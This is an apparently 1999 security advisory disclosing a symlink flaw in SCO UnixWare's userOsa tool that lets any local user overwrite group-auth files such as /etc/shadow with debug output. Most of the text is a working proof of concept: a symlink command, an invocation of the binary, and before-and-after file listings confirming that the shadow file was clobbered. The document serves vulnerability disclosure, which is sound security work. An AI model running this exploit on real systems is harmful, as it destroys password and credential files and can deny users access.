SCOUNIX_shadow_exploit.txt

`Greetings,  
  
Any user may overwrite any file with group auth (i.e. /etc/shadow,  
/etc/passwd) using /etc/sysadm.d/bin/userOsa. Note that this will not  
change the permissions of the file or allow for the user to input a  
passwd entry string into these files, it will simply clobber the contents  
of the file with debug output.  
  
When userOsa recieves invalid input, it generates a log file called  
"debug.log" in the PWD. This file is created with group auth  
permissions,does not check for this file's existence, and will follow  
symlinks. Thus the exploit is as follows:  
  
  
scohack:/tmp$ ln -s /etc/shadow.old debug.log  
scohack:/tmp$ /etc/sysadm.d/bin/userOsa  
bah  
connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect  
Request: bah}}}  
Failed to listen to client  
Failure in making connection to OSA.  
scohack:/tmp$  
  
-----  
  
BEFORE EXPLOIT:  
scohack:/# l /etc/shadow.old  
-rw-rw---- 1 root auth 26 Oct 11 20:08 /etc/shadow.old  
  
AFTER EXPLOIT (note the file size):  
scohack:/# l /etc/shadow.old  
-rw-rw---- 1 root auth 177 Oct 11 20:10 /etc/shadow.old  
  
scohack:/# cat /etc/shadow.old  
>>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by <PID=11604>  
<<<  
SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ  
{Invalid Connect Request: bah}}})  
  
scohack:/#  
  
Brock Tellier  
UNIX Systems Administrator  
`